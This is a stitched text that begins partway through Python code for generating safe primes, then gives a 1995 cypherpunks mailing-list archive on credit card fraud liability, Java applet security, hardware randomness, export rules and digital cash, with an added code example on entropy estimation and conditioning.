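    By Euler's criterion 2**q mod p is 1 exactly when 2 is a square mod p,
    so a result other than 1 means 2 generates all of (Z/pZ)*.
    """
    q = (p - 1) // 2
    return pow(2, q, p) != 1


def find_safe_prime(bits):
    """Return (p, rejected): a random safe prime of exactly `bits` bits and the
    number of primes q that survived the sieve but gave a composite 2q + 1."""
    if bits < 32:
        raise ValueError("use at least 32 bits so candidates exceed the sieve primes")
    rejected = 0
    while True:
        # Force the top bit (exact size) and the low bit (q odd).
        q = secrets.randbits(bits - 1) | (1 << (bits - 2)) | 1
        p = 2 * q + 1
        # Sieve q and p together: most candidates die here without a modexp.
        if any(q % r == 0 or p % r == 0 for r in SMALL_PRIMES):
            continue
        if not is_probable_prime(q):
            continue
        if is_probable_prime(p):
            return p, rejected
        rejected += 1


if __name__ == "__main__":
    p, rejected = find_safe_prime(256)
    print(f"p = {p:#x}")
    print(f"primes q discarded because 2q + 1 was composite: {rejected}")
    print("2 generates the full group" if two_generates_full_group(p)
          else "2 generates the subgroup of order q")
```

Both q and 2q + 1 have to be prime at once, so the density of usable candidates falls off roughly with the square of the bit length, and each test is a full-size modular exponentiation.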




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: charles@europages.com
Date: Thu, 16 Nov 1995 20:56:54 +0800
To: cypherpunks@toad.com
Subject: unsuscribe
Message-ID: <9511161032.AA10705@europages.com>
MIME-Version: 1.0
Content-Type: text/plain


unsuscribe








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 17 Nov 1995 03:42:02 +0800
To: Arley Carter <ac@hawk.twinds.com>
Subject: Re: credit card conventional wisdom
In-Reply-To: <Pine.HPP.3.91.951115165438.20268D-100000@hawk.twinds.com>
Message-ID: <199511161848.KAA06931@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>>  I was attacking the line of thought
>> that goes, "credit card security is already marginal, therefore why 
>> should anyone try to improve it in cyberspace"? this is circular
>> reasoning. "why should anyone try to make something more secure when
>> it is already insecure?"
>> 
>In my post I am looking at this from an economics point of view. Simply
>put: If there is unlimited liability to the credit card holder because
>Mallet is stealing card numbers from the telco switch, encrypted, plain text,
>it doesn't matter, there will be no users.  If there are no users then
>there will be no transaction fees generated, no transaction fees, then it
>won't be deployed.  Therefore, there is no reason to develop the code 
>or even read the latest and greatest specs. and we are all wasting our 
>time.  

I don't believe legal liability is the issue. many businesses operate
despite the fact that they have large liability for what they perform.
the issue is balancing the cost they are guaranteed through their
charges with the liability they face. you are incorrect in thinking that
individual credit card users buy credit cards based on the
liability to themselves, from my point of view. individuals, even
if they are theoretically liable for large fraud costs, simply are not 
going to be able to be held accountable for them.

you seem to be saying that if credit card companies one day guaranteed
they would be responsible for all fraud charges, we would have cybercash
*now*. but credit card companies already do largely have to absorb the
costs of fraud. they are *already* liable. and again, I don't think you
will find the market really cares about liability prior to using 
the service. the individual generally
assumes they are not personally responsible for fraud in the card, and
the companies generally have to adhere to this paradigm.

what if tomorrow a new credit card company started up saying, "we are
not responsible for fraud. all fraud is the responsibility of the 
customer?"  they would be laughed off the planet. such a plan is not
even feasible. the consumer will simply cancel the credit card if they
perceive they are being charged for fraud, and not pay the company 
insisting they are not liable (despite whatever agreement they signed).

>We must recognize that no matter what code we write, how secure it is,
>it won't be used until the banks that must clear the transactions
>agree to accept the risks of loss in return for their transactions fees.

but this has *always* been the case. how is it not the case now? *all*
banks are liable for the security of their schemes. why do you think they
are not? why do you think they care so much about security?

>I haven't seen this from any of these consortiums and would like besides 
>publishing their specs for the best system agree that this risk bearing
>is a necessary step for electronic commerce to become a reality.

why do you think that nobody does not already realize this? isn't it
patently obvious to anyone who starts such a system?

>I would like to see members of the MasterCard and Visa coalitions comment 
>on this aspect of the systems that are promulgating.  The one who cracks
>this nut first without losing their shirt to Mallet will be the winner. The
>others that expect us to deploy systems based upon if Mallet breaks the 
>system, the cardholder and or merchant pays is wasting our time. 

who is proposing that consumers or merchants pay if a system is broken?
why do you think that this is the case? what is more likely is that
these fraud costs will be hidden in transaction charges, just like
they are with current credit cards. the individual consumers and merchants
will then be given the "illusion" that they are not paying for fraud,
but this cost is actually invisibly included in their "transaction
tax".

for the above reasons I don't at all understand why you insist that acceptance 
of liability is the problem delaying introduction of digital cash standards.

but one distinction I do realize has to be made in all this is the
difference between "fraud" and "breaking a system". the latter is
a far more potentially serious problem with cryptographic security than
the former. in fact cryptographic security attempts to deal with all
fraud by making "breaking the system" impossible, and succeeds to the
degree it accomplishes this.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 17 Nov 1995 04:39:59 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: credit card conventional wisdom (fwd)
In-Reply-To: <Pine.SOL.3.91.951115184015.18971A-100000@chivalry>
Message-ID: <199511161923.LAA10460@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>Card Imprints taken with no online authorisation are typically charged a 
>transaction fee of 3-6%: with authorisation, 1.5-3%.  ATM card 
>transactions  are charged at around $0.10 per transaction.

are you saying that a typical mail order credit card transaction has
a 3-6% charge, because the card is not physically present?

this is a rather shockingly high rate.

again, what I have been calling the "fraud tax"-- it's hidden in every
purchase we make, and when we increase credit card security it will
increasingly be dissipated. but the problem is that no one realizes
this in general, and will argue, "why should we do anything to prevent
fraud? we are already not paying for it right now, why should credit
card companies spend any money to prevent it?"

BZZZZZZZT

I suspect these invisible fraud taxes are quite significant in general
and someone could really become very wealthy by inventing a system that
decreased them.

you might increasingly see retailers offer a "safe card discount"--
some brand of credit card charges them less transaction overhead, and
they pass these savings onto the customer.

or, the credit card company could send the money back to you like 
Discover does.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Pettitt <jpp@software.net (John Pettitt)>
Date: Fri, 17 Nov 1995 04:56:22 +0800
To: "Vladimir Z. Nuri" <ac@hawk.twinds.com>
Subject: Re: credit card conventional wisdom
Message-ID: <199511161930.LAA20815@software.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:48 AM 11/16/95 -0800, Vladimir Z. Nuri wrote:
>
        ... about credit card liability

Hmmm, a few words about credit card liability.

The situation now is that in a "card not present" transaction the merchant is
liable for the fraud.  This means that *a lot* of internet based stores are 
getting eaten alive by fraud.  The big issue right now is not cards being
stolen from the telco switch (yes it's a risk but can anybody cite it
happening?).
The issue is authentication of the card user.  We have a significant
investment in AI / credit scoring code to defeat the wannabe crackers.  This
goes way beyond mod 10 checks and address verification.

[ as an aside I've put two people in jail this year for card fraud ]

John
John Pettitt, jpp@software.net
VP Engineering, CyberSource Corporation, 415 473 3065





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg_Rose@sibelius.sydney.sterling.com (Greg ROSE)
Date: Thu, 16 Nov 1995 09:05:50 +0800
To: hallam@w3.org
Subject: Re: credit card conventional wisdom
In-Reply-To: <9511151659.AA03934@zorch.w3.org>
Message-ID: <9511160031.AA41675@paganini.sydney.sterling.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

  >No. What Phil is saying is that the magnetic strip contains an extra 
  >group of digits which are only available when the stripe is read, and not 
  >when the card is used for CNP. 

  The extra digits I was referring to are the ones on the front of the card 
  but not embossed.

Wow, you learn something every day. I've never in
my whole life (well, my American Express life,
over 15 years) noticed those four digits. I've
never been asked for them by anyone, or noticed
them being written down, either. Exactly when and
how are they used?

Greg.

Greg Rose               INTERNET: greg_rose@sydney.sterling.com  
Sterling Software       VOICE:  +61-2-9975 4777    FAX:  +61-2-9975 2921
28 Rodborough Rd.       http://www.sydney.sterling.com:8080/~ggr
French's Forest         35 0A 79 7D 5E 21 8D 47  E3 53 75 66 AC FB D9 45
NSW 2086 Australia.     co-mod sci.crypt.research, USENIX Director.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mrm@netcom.com (Marianne Mueller)
Date: Fri, 17 Nov 1995 05:04:49 +0800
To: cypherpunks@toad.com
Subject: Java & Netscape security (reply to misc. postings)
Message-ID: <199511161933.LAA18504@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi Harry & Perry & Jeff & Dr Cohen & "Alice" -

1.  Netscape security: 

Like Jeff said, Netscape 2.0beta has all the same security features as
JDK beta.  (JDK = Java Developer's Kit, the name for our current
product.)  Netscape and Sun have been cooperating closely to
implement, and test, and document the applet security model.  The
applet security manager and the applet class loader are implemented at
the Java layer, for which source code is available from Sun.

Granted, some elements of the applet security model are
implemented at the Java<-->runtime level, and that's why we have tests
that we run on the appletviewer and on Netscape Navigator.

2.  Corporate security class: 

  Harry asks: 

  | My question is, can a corporate user replace the security class in
  | Netscape. I understand that all the class libs are in an external
  | file. While a virus might exploit this... my reason for asking is for
  | corporate developers who are building "intra"net systems.. making some
  | tweaks to the security class would give them the flexibility they need.
  | Otherwise we have taken much of the fun out of Java. (for good
  | reasons).

The best thing to do if you want to implement your own
intra-corporation security model in the short run is to get a copy of
the beta source code, and take a look at AppletSecurity.java and
AppletClassLoader.java.  You can substitute your own versions of those
for your inhouse use.  This is relatively easy to do with the
appletviewer, and although it's possible to do some binary hack on
moz2_0.car and replace certain files with your own, it's probably not
everyone's cup of tea.  I mean, there's a difference between what you
can do, and what you want to do ... I understand that!

For the next release, we are working on how to enable people to
accomplish what you want to accomplish, in a standard way and in a
usable way, which preserves the applet security model.  The goal is to
design the APIs so that applets can have access to more system
functionality in a secure way.  Presumably what you really want to do
is write applets that have access to file i/o (or what have you), not
re-implement the security manager.


3.  Postscript considered dangerous:   (insert-smiley) 

As for the question of someone invoking a postscript interpreter via a
browser and thus opening up their system to some rogue postscript
file: I think it would be great if either of these two things were to
magically happen:

	1) people would stop putting postscript docs on web pages
	because it's the wrong technology for WWW - it wastes
	bandwidth - it's hard to view & hence often ugly - everyone
	just prints it out anyway and then complains because there
	is no one "standard" implementation of postscript printing
	worldwide and there are dozens of minor problems

	2) someone could implement a secure postscript previewer
	(whatever that means!) 

I doubt either of those two things will happen.  The average Jo on the
internet needs to understand that when s/he downloads binary files
over the internet and runs them from insecure programs on their local
computer, well, s/he runs some risk.  This risk might be tiny, but
it's impossible to quantify loss.  If I lose a poem that I'm writing,
to me that's priceless, so I do not intend to imply that loss of data
isn't tragic for the person who loses it.  If you have data you can't
bear to lose, be sure to practice safe computing.  Perform backups
regularly, and use judgement about which interpreters and executable
programs you allow to run on your PC.

Marianne

--
internet fan, mrm@netcom.com
Java Products Group, mrm@eng.sun.com  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mrm@netcom.com (Marianne Mueller)
Date: Fri, 17 Nov 1995 08:46:45 +0800
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Java & Netscape security (reply to misc. postings)
In-Reply-To: <9511162108.AA08466@all.net>
Message-ID: <199511162123.NAA06232@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi Dr Cohen -

I work for Sun, and I don't speak for Netscape!     I do my best
to post messages that are accurate and that can be substantiated,
but that is not the same as being an official spokesperson. 

I think reasonable people can disagree on the dangers of
postscript interpreters.  I do not dismiss your concerns - I was
 merely pointing out that the fix may be simply not to run a postscript
interpreter.  That decision is made by a user, not by a web browser. 

Marianne
Java Products Group  (this is the name of the Java group at Sun)
Sun Microsystems, Inc. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg_Rose@sibelius.sydney.sterling.com (Greg ROSE)
Date: Thu, 16 Nov 1995 10:44:52 +0800
To: cypherpunks@toad.com
Subject: Amex cards extra four digits
In-Reply-To: <9511160031.AA41675@paganini.sydney.sterling.com>
Message-ID: <9511160227.AA09304@paganini.sydney.sterling.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Oops, following up my own posting, it proves I
should have been more careful...

I wrote
  Wow, you learn something every day. I've never in
  my whole life (well, my American Express life,
  over 15 years) noticed those four digits. I've
  never been asked for them by anyone, or noticed
  them being written down, either. Exactly when and
  how are they used?

But when I reread it I thought it sounded
sarcastic. It isn't -- there really are an extra
four digits printed on both my Amex cards that I'd
never noticed before -- and my question is
serious.

Greg.

Greg Rose               INTERNET: greg_rose@sydney.sterling.com  
Sterling Software       VOICE:  +61-2-9975 4777    FAX:  +61-2-9975 2921
28 Rodborough Rd.       http://www.sydney.sterling.com:8080/~ggr
French's Forest         35 0A 79 7D 5E 21 8D 47  E3 53 75 66 AC FB D9 45
NSW 2086 Australia.     co-mod sci.crypt.research, USENIX Director.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Fri, 17 Nov 1995 03:34:41 +0800
To: pmonta@qualcomm.com
Subject: Re: Hardware-random-bits interface
In-Reply-To: <199511152205.OAA27271@comsec.com>
Message-ID: <9511161835.AA00247@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Tue, 14 Nov 1995 14:31:46 -0800
>From: Peter Monta <pmonta@qualcomm.com>

>A rate of 300 kB/s will make a 600 MB one-time pad in an hour
>(assuming software is similarly fast).  I'm wondering if any
>of the mail systems have convenient hooks to use pads (though
>it would not be difficult to write up).
>
>Suggestions welcome.  I'll put the design on the Web
>once it's finished; replicating it should be pretty easy.
>People can also grab the device driver if they wish.

I'd be nervous about using a radio receiver which can be fed with a signal
by the adversary.  A noisy resistor or diode should be less subject to bias
by an active opponent.

Whatever you use for a source of bits, it should be carefully measured to
determine how much real entropy is in the source.  Don't assume all the
bits you get are independent, flat distribution bits.

You might need to hash bits down until you get independence.  You also
might want to provide some further ranno conditioning.

	cf. http://www.clark.net/pub/cme/P1363/ranno.html  (on ranno theory)
	and http://www.clark.net/pub/cme/html/ranno.html   (on conditioning)

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+
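
The two points made above, measure the real entropy rather than assuming flat independent bits, then hash down, can be seen on a small simulation. This is an added example, not part of the original message and not the code behind the referenced ranno pages. The correlated source is constructed sample data, and the most-common-value estimator, SHA-256 as the conditioner and the 2x safety margin are assumptions chosen for the illustration.

```python
import hashlib
import math
import random
from collections import Counter


def correlated_bits(n, stay=0.9, seed=1995):
    """Constructed sample source: each bit repeats the previous one with
    probability `stay`, so ones and zeros are balanced but far from independent."""
    rng = random.Random(seed)
    bit = rng.getrandbits(1)
    out = []
    for _ in range(n):
        if rng.random() >= stay:
            bit ^= 1
        out.append(bit)
    return out


def min_entropy_per_bit(bits, block=1):
    """Most-common-value estimate of min-entropy per input bit.

    The stream is cut into non-overlapping `block`-bit words and the estimate is
    -log2(p_max) / block. With block=1 only bias is visible; larger blocks also
    see dependence between neighbouring bits.
    """
    words = [tuple(bits[i:i + block])
             for i in range(0, len(bits) - block + 1, block)]
    p_max = Counter(words).most_common(1)[0][1] / len(words)
    return -math.log2(p_max) / block


def condition(bits, entropy_per_bit, out_bytes=32, margin=2.0):
    """Hash raw bits down so each output is backed by `margin` times its own
    length in estimated entropy. Returns (raw bits consumed per output, outputs)."""
    if not 0 < entropy_per_bit <= 1:
        raise ValueError("entropy estimate must be in (0, 1] bits per bit")
    if not 0 < out_bytes <= 32:
        raise ValueError("SHA-256 yields at most 32 bytes per call")
    need = math.ceil(out_bytes * 8 * margin / entropy_per_bit)
    outputs = []
    for i in range(0, len(bits) - need + 1, need):
        raw = bytes(bits[i:i + need])       # one byte per raw bit; fine as hash input
        outputs.append(hashlib.sha256(raw).digest()[:out_bytes])
    return need, outputs


if __name__ == "__main__":
    sample = correlated_bits(200_000)
    h1 = min_entropy_per_bit(sample, block=1)
    h8 = min_entropy_per_bit(sample, block=8)
    need, outs = condition(sample, h8)
    print(f"bit-frequency estimate : {h1:.3f} bits of entropy per raw bit")
    print(f"8-bit block estimate   : {h8:.3f} bits of entropy per raw bit")
    print(f"raw bits hashed per 256-bit output: {need} ({len(outs)} outputs)")
```

Counting ones and zeros alone rates this source at close to one bit of entropy per bit, while the 8-bit block estimate is several times lower. The block estimate is still optimistic for dependence longer than the block, which is what the margin is for.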





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg_Rose@sibelius.sydney.sterling.com (Greg ROSE)
Date: Thu, 16 Nov 1995 11:06:56 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: credit card conventional wisdom (fwd)
In-Reply-To: <Pine.SOL.3.91.951115182044.18955B-100000@chivalry>
Message-ID: <9511160242.AA41564@paganini.sydney.sterling.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

  The printed digits above the embossed account number are the first four
  digits of the BIN (on Visa cards) or ICA (on MasterCards). They are there
  to discourage re-embossing of the card with another account number.

True for Visa cards, but false for the AMEX. On my
two Amex cards there is no obvious relationship
between the four digit number and the embossed
card number.

Greg.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sat, 18 Nov 1995 09:22:37 +0800
To: cypherpunks@toad.com
Subject: Re: Java & Netscape security (reply to misc. postings)
In-Reply-To: <199511161933.LAA18504@netcom20.netcom.com>
Message-ID: <30ABB66D.3492@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Frederick B. Cohen wrote:

[ quoted comments from mrm@netcom.com (Marianne Mueller) removed ]

> It seems clear from this that Netscape, or at least Marianne who seems
> to speak for Netscape, doesn't understand the protection issues that my
> clients face.  I will nevertheless forward this official Netscape line
> to them so they can better understand why I tell them it is insecure.

  Ahem.  mrm@netcom.com is not a Netscape employee.  netcom.com is not
the same as netscape.com.  Marianne is a Sun employee, who is working
on Java.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 17 Nov 1995 05:49:43 +0800
To: tcmay@got.net
Subject: Re: e$: Come aaaannnndddd Get it!
Message-ID: <01HXPQLC7L688WY0D1@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Incidentally, I would like to apologize if I am going over (and not
contributing anything new to) discussion that has already taken place. If
anyone has or knows of an archive of the earlier list messages on the subject
(before I subscribed), I would like to read over them.

From: tcmay@got.net at 16-NOV-1995 13:00:29.05:

At 12:18 PM 11/16/95, Robert Hettinga wrote:
>
>Ahhh. Next year in Jerusalem...
-----------
        Although I am unfortunately not completely familiar with this phrase,
I believe that your meaning here may be that I may be too much of an idealist. 
My position is that I will not use a digital cash system with the significant 
deficits in privacy that the ecash system has. The only exception to this
stance would be if it becomes plain that it is the only alternative to a
credit card system.
        Admittedly, as has been pointed out to me in private email, some
degree of increased privacy in the ecash system can be gotten via
changing currencies using ecash. An example would be dollars to yen
through one changer and back again through another. However, I will not
regard a digital cash system as truly good until it has the following
traits:
        A. Private to any combination except all three of bank, sender, and
receiver.
        B. The bank does not know the amount transacted or owned, unless it
is the sender or receiver. (Obviously, it will know the total amount of
digital cash of its issuance in existence, and how much it has received from
or sent to each person, but it should not need to know anything more).
        C. Double spending is detectable, but does not reveal the identity
of the individual. Thus, the bank does not need to know the identity of
the individual when issuing the digital cash.

        The following are desirable but not strictly necessary
characteristics:
        A. Offline transactions are possible. To detect double spending, a
transaction with the bank will probably be necessary, but this should
ideally be postponable until the goods purchased are shipped.
        B. Mathematical as opposed to computational authentication and
privacy. Since I am neither a mathematician nor a programmer, I am
uncertain about whether this last is possible. I have my doubts.
--------------

>Tell me, are you actually selling something on the net yet? How many
>customers do you have?
--------------
        If A. such a system as the above were set up and B. I had available
any computer programs, etcetera necessary to use it, then I would at
least _try_ selling something on the net. This something would be not
data itself, but true information- data with interpretations. I am
qualified to produce such a service in some areas in biology and
medicine. I am currently in a Ph.D. program in Molecular Genetics and
Microbiology, and my chief area of interest is gene therapy- I have thus
learned some things about human physiology. Perhaps more importantly than
my own knowledge and experience, I know who to ask and have such
individuals available. Admittedly, I would have to fit it into the time
between exams, or more likely between semesters.
--------------

Bob, let me do a minor vent here.

You are critical of E. Allen Smith's viewpoint, and essentially question
whether he has anything to sell. Not much of an argument.
---------------
        Thank you. (I would say "Thank you for your support," but my name is
neither Bartles (sp?) or James.)
---------------

Especially when folks are urging that "people put their money where their
mouth is" and get MTB accounts.

Me, I don't plan to sign up for various reasons:

1. I'm not selling anything, and won't sign up just for "moral support."
(I tried this once before, getting an AMIX account early on, and that
system offered more of a chance for a 2-way market. Still, a waste of my
time.)
---------------
        I tried signing up for AMIX also, but unfortunately came in too late
(after it closed down). I might consider signing up for a system with the
characteristics described above for "moral support," but I will not do so
for a system that I hope is replaced by a better one.

---------------
2. I wish Mark Twain Bank well, but the success of the kinds of digital
cash we hope to see will not likely hinge on the success of one
particular operation, such as MTB.

3. The success of BankAmericard (later renamed Visa) came when real
customers and real shops started to use it, not when early pioneers set
themselves up as clearinghouses and whatnot.
---------------
        Online commerce systems can be divided into four types, of
increasing level of desirability (and decreasing level of governmental
approval):
        A. Credit-card based systems such as credit card number encryption
and First Virtual.
        B. Partially privacy-protecting systems such as ecash.
        C. Fully privacy-protecting systems with the characteristics
described above, based on a governmental currency.
        D. Fully privacy-protecting systems with the characteristics
described above, based on a privately-produced currency and backed by the
issuer.
        I suspect that the first and second will have the most aboveground
chance of succeeding, given likely governmental interference in the third
and fourth; lack of public comprehension of all of the digital cash
systems and of privately-produced currency will impede some of them also.
However, the fourth may be a possibility for an "underground" currency
system, to be used among computer-literate individuals with an aversion
to government. I am currently creating an idea for a system of the fourth
type, and will put it on the exi-essay list when it is complete.
Incidentally, I suspect a privately-produced currency system may be
harder to regulate than a governmentally-produced currency system,
especially if the former is set up properly. I will explain further about
this idea in the aforementioned exi-essay system.
---------------

I have more interesting things to do, personally, than to be a pioneer so
I can then have nothing to sell, and little to buy....when "interesting
markets" start to appear, I'll look at it again.

In any case, I wish all the pioneers well, and am happy to see Lucky
Green's involvement.
---------------
        I also agree in wishing the "pioneers" well. The ecash system is
definitely preferable to one based on means such as credit cards.
        -Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Fri, 17 Nov 1995 08:29:40 +0800
To: jimbell@pacifier.com (jim bell)
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <m0tFpbT-0008yaC@pacifier.com>
Message-ID: <199511162113.QAA08492@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


jim bell writes:
>>jim bell writes:
>>>>I think it's 121.1, Category XIII paragraph (b) item (5):
>>>>"Ancillary equipment specifically designed or modified for paragraphs (b)
>>>>(1), (2), (3), (4) and (5) of this category;"
>>>
>>>Question:  What makes computers in general NOT describable by such a
>>>paragraph?!?
>>
>>The referenced paragraphs describe cryptographic hardware, software and
>>technical data.  Computers in general are not "specifically designed"
>>as cryptographic equipment.
>
>Great!  Then you must merely ensure that there is at least one
>(non-encryption) program around that can use the same hooks.

The problem is that the non-encryption program must use the same
interface as the encryption program.  Text compression is often cited
as an example of a non-encryption program that can use the same hooks
as a compression program, but there's a key difference:  the text
compressor *doesn't* need a key.

The encryption tool would have an interface like
    Boolean (*)( DataSource, DataSink, void*);

A compressor written to the same interface would never need to touch
that third argument.  Therefore, the second argument is "specifically
designed" to permit an encryption tool to be used.

You'd need a program which not only *accepted* the additional parameter,
but also *needed* the second parameter.  I confess I have some difficulty
thinking of one.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cassiel@alpha.c2.org (Cassiel)
Date: Fri, 17 Nov 1995 10:04:46 +0800
To: cypherpunks@toad.com
Subject: The Great FAQ Hunt
Message-ID: <199511162319.PAA24869@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Several fellow newbies have written me asking to share
the sources I received re: where to get the uncorrupted
Cypherpunk FAQ (Cyphernomicon).  You can get it uncompressed--
along with a lot of other cool stuff, like the Applied
Crypto book--at Pat Farrell's Web Site (thanks, Pat!)

http://www.isse.gmu.edu/~pfarrell/crypto.html

However, when I tried to summon up this 1.2 MB tome with 
Netscape, my computer choked.  Changing the cache settings
didn't seem to help, so I wound up downloading it via FTP
from

ftp.netcom.com /pub/tc/tcmay

where you can also get your hands on the shorter MFAQ (Most
Frequently Asked Questions).

Hope this helps.  I'm on an info-diet, Cypherpunk Lite, so if 
you want to respond to this message, please be sure to "cc"
me directly.

Cassiel




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arley Carter <ac@hawk.twinds.com>
Date: Fri, 17 Nov 1995 08:50:49 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: credit card conventional wisdom
In-Reply-To: <199511161848.KAA06931@netcom3.netcom.com>
Message-ID: <Pine.HPP.3.91.951116143115.21342A-100000@hawk.twinds.com>
MIME-Version: 1.0
Content-Type: text/plain


Vladimir:
Calm down.  This is why I started my post with "Maybe this is stupidly
obvious question but....."  I am trying to illustrate some simple points
and ask some simple questions:

1. Risk to a cardholder is on a vastly different scale than risk to the Bank 
Consortiums that run the credit card business. Charge offs and fraud
are of course as you point out a cost of doing business.  If it is not an 
acceptable risk to the card holder and the bank it won't happen.  The bank
won't deploy a system that they view as exposing them to unacceptable loss.
The cardholder will not use a system that offers him no recourse to recover
losses. End of Story.  

2. The Bank Consortiums are doing a poor job of explaining to cardholders,
merchants and developers such as you and me that are supposed to
implement these "open" specs exactly *what* our risks are in developing and
deploying these systems on our servers. The bank consortiums will have 
contracts or usage agreements governing the clearing of transactions in 
cyberspace.   When a loss is claimed by a cardholder, how will the loss
(if there is one) be allocated between the cardholder, merchant, the company
operating the server that processed the credit card and the bank?

3.  I'm getting tired of seeing posts to this list about what is more dangerous,
cyberspace or restaurantspace.  Let's focus on the real mechanics of how
the ground rules of credit card clearing will operate in cyberspace. The
credit card consortiums can advance the cause of electronic commerce by
stating in unambiguous terms what their views are of these ground rules.
Developers, cardholders and merchants can then make a judgement on whether
those risks are acceptable to each party respectively.  

Regards:
-arc

Arley Carter
Tradewinds Technologies, Inc.
email: ac@hawk.twinds.com
www: http://www.twinds.com

"Trust me. This is a secure product. I'm from <insert your favorite 
corporation of government agency>."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arley Carter <ac@hawk.twinds.com>
Date: Fri, 17 Nov 1995 07:20:28 +0800
To: John Pettitt <jpp@software.net>
Subject: Re: credit card conventional wisdom
In-Reply-To: <199511161930.LAA20815@software.net>
Message-ID: <Pine.HPP.3.91.951116152854.21342B-100000@hawk.twinds.com>
MIME-Version: 1.0
Content-Type: text/plain


In this context is the merchant defined as the corporation selling the
physical good for delivery or the corporation that is operating the server?
These two parties under certain circumstances may be the same party, but 
in this example let's assume they are separate entities.

If I am interpreting "internet based stores" in the proper context, the 
cardholder and the bank have recourse against the company operating the 
server.  Is this correct?  

Regards:
-arc

Arley Carter
Tradewinds Technologies, Inc.
email: ac@hawk.twinds.com
www: http://www.twinds.com

"Trust me. This is a secure product. I'm from <insert your favorite 
corporation of government agency>."

On Thu, 16 Nov 1995, John Pettitt wrote:

> At 10:48 AM 11/16/95 -0800, Vladimir Z. Nuri wrote:
> >
>         ... about credit card liability
> 
> Hmmm, a few words about credit card liability.
> 
> The situation now is that in a "card not present" transaction the merchant is
> liable for the fraud.  This means that *a lot* of internet based stores are 
> getting eaten alive by fraud.  The big issue right now is not cards being
> stolen from the telco switch (yes it's a risk but can anybody cite it
> happening?).  The issue is authentication of the card user.  We have a
> significant investment in AI / credit scoring code to defeat the wannabe
> crackers.  This goes way beyond mod 10 checks and address verification.
> 
> [ as an aside I've put two people in jail this year for card fraud ]
> 
> John
> John Pettitt, jpp@software.net
> VP Engineering, CyberSource Corporation, 415 473 3065
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Fri, 17 Nov 1995 07:31:12 +0800
To: John Pettitt <cypherpunks@toad.com
Subject: Re: credit card conventional wisdom
In-Reply-To: <199511161930.LAA20815@software.net>
Message-ID: <9511162041.AA03234@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>The situation now is that in a "card not present" transaction the merchant is
>liable for the fraud.  This means that *a lot* of internet based stores are 
>getting eaten alive by fraud.

This is not quite accurate. In the US there is that distinction, in the UK
the credit card co is responsible. For that reason the requirement that
goods be delivered to the billing address _ONLY_ is strictly enforced.


>[ as an aside I've put two people in jail this year for card fraud ]

Good to hear that!

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 17 Nov 1995 12:02:42 +0800
To: EALLENSMITH@ocelot.Rutgers.EDU (E. ALLEN SMITH)
Subject: Re: e$: Come aaaannnndddd Get it!
In-Reply-To: <01HXORFUEO5Y8WY0P1@mbcl.rutgers.edu>
Message-ID: <199511162356.PAA28194@infinity.c2.org>
